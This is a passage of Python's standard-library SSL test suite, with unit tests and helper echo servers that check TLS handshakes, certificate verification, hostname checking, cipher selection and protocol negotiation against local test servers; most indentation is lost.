# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
        # NOTE: the subject hashing algorithm changed between OpenSSL 0.9.8n
        # and 1.0.0; as a result, the capath directory must contain both
        # versions of each certificate (same content, different filename)
        # for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
# TODO: fix TLSv1.3 support
ctx.options |= ssl.OP_NO_TLSv1_3
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
# TODO: fix TLSv1.3 support
ctx.options |= ssl.OP_NO_TLSv1_3
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
        # A simple I/O loop.  Call func(*args) and, depending on the error we
        # get (WANT_READ or WANT_WRITE), move data between the socket and the
        # BIOs.
timeout = kwargs.get('timeout', 10)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
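        # Perform a full handshake over a MemoryBIO pair: the SSLObject never
        # touches the socket directly; ssl_io_loop() shuttles the raw bytes
        # between the BIOs and the TCP connection.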
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(support.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with support.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
#should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
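    """TLS echo server running in a background thread.  Each accepted
    connection is handled by a ConnectionHandler thread, optionally after a
    STARTTLS exchange."""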
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
            self.sock.setblocking(True)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
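            # Upgrade the accepted TCP connection to TLS, recording the
            # negotiated NPN/ALPN protocols; on failure, store the error as a
            # string (to avoid reference cycles) and shut the server down.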
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ssl.SSLError, ConnectionResetError, OSError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# OSError may occur with wrong protocols, e.g. both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
        def write(self, data):
            if self.sslconn:
                return self.sslconn.write(data)
            else:
                return self.sock.send(data)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
    class EchoServer(asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
    def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(SIGNED_CERTFILE)
ctx.load_verify_locations(SIGNING_CA)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
if protocol in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
continue
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
                # getpeercert() raises ValueError while the handshake isn't
                # done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
def test_ecc_cert(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers(
'TLS13-AES-128-GCM-SHA256:TLS13-CHACHA20-POLY1305-SHA256:'
'ECDHE:ECDSA:!NULL:!aRSA'
)
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC cert
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
client_context.options |= ssl.OP_NO_TLSv1_3
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_check_hostname_idn(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(IDNSANSFILE)
# TODO: fix TLSv1.3 support
server_context.options |= ssl.OP_NO_TLSv1_3
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify, when specified in several
# different ways
idn_hostnames = [
('könig.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
